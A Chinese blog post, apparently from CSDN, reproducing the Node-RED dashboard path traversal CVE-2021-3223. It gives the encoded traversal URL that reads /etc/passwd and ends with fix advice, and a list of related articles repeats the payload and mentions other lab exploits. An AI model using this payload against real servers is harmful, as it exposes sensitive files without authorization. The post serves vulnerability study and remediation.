Node-RED任意文件读取(CVE-2021-3223)

最新推荐文章于 2024-04-18 11:37:29 发布
最新推荐文章于 2024-04-18 11:37:29 发布
阅读量614 收藏 10
点赞数 11
文章标签: web安全 网络安全 python
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_65150886/article/details/135268960
版权

漏洞描述:

Node-RED 在/nodes/ui_base.js中,URL与’/ui_base/js/*'匹配,然后传递给path.join,
缺乏对最终路径的验证会导致路径遍历漏洞,可以利用这个漏洞读取服务器上的敏感数据,比如settings.js

复现过程:

1.访问ip:port

2.访问

http://ip:port/ui_base/js/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd

获取password文件

修复建议:

  1. 升级版本。
  2. 对访问的url进行过滤和验证。

慕筱蚺
关注
  • 11
    点赞
  • 10
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Node-RED ui_base 任意文件读取漏洞 CVE-2021-3223
weixin_51387754的博客
11-25 1056
漏洞简介 Node-RED 在/nodes/ui_base.js中,URL与’/ui_base/js/*'匹配,然后传递给path.join, 缺乏对最终路径的验证会导致路径遍历漏洞,可以利用这个漏洞读取服务器上的敏感数据,比如settings.js 漏洞复现 title=“Node-RED” 访问页面 验证poc /ui_base/js/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd /ui_base/js/..%2f..%
node-red File读取好保存实例讲解
01-20
File节点是操作文件的节点 file文件的保存 拖拽 注入节点inject  file节点(writes msg.payload to a file)和 debug节点到工作区,并连线 设置file节点的文件路径 windows如果不设置路径,会保存在C:\Users\Administratordocker容器保存在根目录下 此处文件名我选择 放到data目录下,因为docker容器启动的时候我把/data目录挂载到宿主机上了,方便查看文件 行为有三种,追加至文件  复写文件  删除文件 勾选上创建目录,否则如果目录和文件不存在,需要手动创建 例子: [{id:898828bc.
vulfocus靶场之redis命令执行cve-2022-0543漏洞复现
最新发布
没有故事
04-18 771
我们借助Lua沙箱中遗留的变量package的loadlib函数来加载动态链接库/usr/lib/x86_64-linux-gnu/liblua5.1.so.0里的导出函数luaopen_io。Debian以及Ubuntu发行版的源在打包Redis时,不慎在Lua沙箱中遗留了一个对象package,攻击者可以利用这个对象提供的方法加载动态链接库liblua里的函数,进而逃逸沙箱执行任意命令。Redis是著名的开源Key-Value数据库,其具备在沙箱中执行Lua脚本的能力。输入网址和端口,点击OK。
Node-RED中将CSV数据写入txt文件并从文件读取解析数据
BADAO_LIUMANG_QIZHI的博客
04-15 2215
场景 Node-RED简介与Windows上安装、启动和运行示例: Node-RED简介与Windows上安装、启动和运行示例_霸道流氓气质的博客-CSDN博客_nodered windows Node-RED怎样导出导入流程为json文件Node-RED怎样导出导入流程为json文件_霸道流氓气质的博客-CSDN博客_怎么导出json文件 CSV的内容是使用纯文字方式表示的表格资料,第一行是表格的标题,每一列用,隔开。 例如: Name,height,weight Joe,170,70
Node-Red系列教程——NodeRed基本操作function函数,http请求响应,file文件
鲸鱼姐的专栏
08-26 7357
NodeRed基本操作——function函数,http请求响应,file文件
任意文件读取和漏洞复现
weixin_58954236的博客
09-02 4157
一些网站的需求,可能会提供文件查看与下载的功能。如果对用户查看或下载的文件没有限制或者限制绕过,就可以查看或下载任意文件。这些文件可以是漂代码文件,配置文件,敏感文件等等。任意文件读取与下载可能形式不同,但是从本质上讲读取与下载没有区别,从权限角度来讲,读取与下载都需要权限。
CVE-2021-21972:CVE-2021-21972漏洞利用
03-04
CVE-2021-21972 CVE-2021-21972工作于VMware-VCSA-all-6.7.0-8217866,VMware-VIM-all-6.7.0-8217866 :heavy_check_mark: VMware-VCSA-all-6.5.0-16613358 :heavy_check_mark:对于vCenter6.7 U2 + vCenter 6.7U2 +在...
CVE-2018-18778.docx
07-23
**CVE-2018-18778:mini_httpd任意文件读取漏洞详解** CVE-2018-18778 是一个针对 mini_httpd 服务器的严重安全漏洞,它允许攻击者通过精心构造的HTTP请求来读取服务器上的任意文件。这个漏洞源于 mini_httpd 对于...
CVE-2021-21315-PoC:CVE 2021-21315 PoC
03-03
CVE-2021-21315系统信息这是的概念证明,它影响到的系统信息库(npm程序包“ systeminformation”)。 “请务必检查或清理传递给si.inetLatency(),si.inetChecksite(),si.services(),si.processLoad()的...
CVE-2021-25646-Apache Druid漏洞POC.py
02-26
CVE-2021-25646-Apache Druid漏洞POC.py
laravel-CVE-2021-3129-EXP-main.zip 写shellexp
12-17
CVE-2021-3129,也被称作“Laravel 文件上传漏洞”,源于 Laravel 框架在处理文件上传时的不安全配置。该漏洞允许攻击者通过精心构造的输入来绕过安全检查,从而将恶意代码上传到服务器并执行。这个漏洞存在于 ...
CVE-2021-21975:Nmap脚本检查漏洞CVE-2021-21975
04-06
CVE-2021-21975 Nmap脚本检查漏洞CVE-2021-21975 漏洞参考: 博客 例子 nmap -p443 --script cve-2021-21975.nse --script-args vulns.showall IP
CVE-2011-0816, CVE-2011-0831, CVE-2011-0832, CVE-2011-0835
06-20
CVE-2011-0816, CVE-2011-0831, CVE-2011-0832, CVE-2011-0835, CVE-2011-0838, CVE-2011-0848, CVE-2011-0870, CVE-2011-0876, CVE-2011-0879, CVE-2011-0880, CVE-2011-2230, CVE-2011-2231, CVE-2011...
vulfocus靶场通关(目录遍历)
信安是不可或缺的一部分!
01-31 2164
该框架使用了特定的方式来进行配置,从而使开发人员不再需要定义样板化的配置。但是,删除运行应用程序的用户对运行应用程序不需要的任何目录的读取访问权限可以限制影响。受影响的版本为 8.5.14 之前的版本、8.13.6 之前的 8.6.0 版本以及 8.16.1 之前的 8.14.0 版本。uWSGI是一款Web应用程序服务器,它实现了WSGI、uwsgi和http等协议,并支持通过插件来运行各种语言,uWSGI 2.0.17之前的PHP插件,没有正确的处理DOCUMENT_ROOT检测,导致用户可以通过…
node-red教程3.3 file控件介绍
geekYatao
06-19 7833
  File节点分为两种,功能分别是file in与file out 3.3.1 file的说明信息   File in 控件 读取文件的内容,输出为字符串或二进制缓冲区。 输入 字符串形式的文件名 如果不在节点配置中设置,则该属性设置为需要读取文件名。 输出 字符串或数组的输出 文件的内容是一个字符串或二进制缓冲区 文件名 建议配置文件名的选项,可以设置为路径\文件...
node.js 命令执行 (CVE-2021-21315)复现[VULFOCUS]
m0_37638874的博客
09-06 1921
Node.js-systeminformation是用于获取各种系统信息的Node.JS模块,它包含多种轻量级功能,可以检索详细的硬件和系统相关信息 npm团队发布安全公告,Node.js库中的systeminformation软件包中存在一个命令注入漏洞(CVE-2021-21315),其CVSSv3评分为7.8。攻击者可以通过在未经过滤的参数中注入Payload来执行系统命令。里注册申请一个账号,得到一个申请的网址。
CVE-2021-3223
09-07
CVE-2021-3223 是一个与Node-RED平台相关的高危漏洞,存在可能导致安全风险的问题。通过自研白盒代码扫描引擎和人工审计,该漏洞在Node-RED官方提供的可视化插件Node-RED-dashboard中被发现。该漏洞的具体细节和潜在利用方式还需要进一步研究和分析。 此外,根据Node-RED的历史CVE数据,我们也可以看到之前已经修复过一个编号为CVE-2019-15607的XSS漏洞。 总结来说,CVE-2021-3223Node-RED平台中一个存在安全风险的漏洞,需要注意并及时采取相应的修复措施。<span class="em">1</span><span class="em">2</span><span class="em">3</span><span class="em">4</span>

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值